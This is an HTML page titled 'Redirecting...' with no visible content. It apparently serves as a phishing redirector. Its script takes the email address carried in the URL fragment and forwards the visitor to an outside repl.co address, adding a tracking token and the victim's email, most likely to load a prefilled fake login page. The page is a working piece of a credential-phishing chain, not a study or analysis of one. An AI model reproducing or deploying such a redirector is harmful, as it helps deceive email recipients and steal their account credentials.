<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Redirecting...</title>
<script> 
var hash = window.location.hash;
if(hash !== "") {

    hash = hash.split('#');
    const email = hash[1];

    window.location.href = "https://wethotpinkabstraction.maudeplaceres.repl.co/index.html?upn=SCul97un1Jb5cVsWRzcmKLjAU9krJ7V7Pn2LnJN-2Fm8nSGQJp-2BesLkjDykmyecRcQJZH9oP-2F11o4-2#" + email;
}
</script>
</head>

<body>
</body>
</html>
